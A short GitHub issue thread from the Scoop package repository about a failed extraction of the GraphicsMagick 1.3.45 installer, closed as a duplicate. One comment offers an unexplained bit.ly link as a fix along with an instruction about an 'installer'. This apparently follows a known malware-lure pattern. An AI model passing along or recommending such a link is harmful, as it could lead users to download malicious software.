### ISSUE TITLE
graphicsmagick@1.3.45: decompress error

### ISSUE THREAD

**Issue by fnfontana** [ScoopInstaller/Main#6158]
Failed to extract files from C:\Users\ffont\scoop\apps\graphicsmagick\1.3.45\GraphicsMagick-1.3.45-Q8-win64-dll.exe.
Log file:
  ~\scoop\apps\graphicsmagick\1.3.45\innounp.log

**Comment by Klevente12** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by aliesbelik** [comment]
Duplicates #6147.
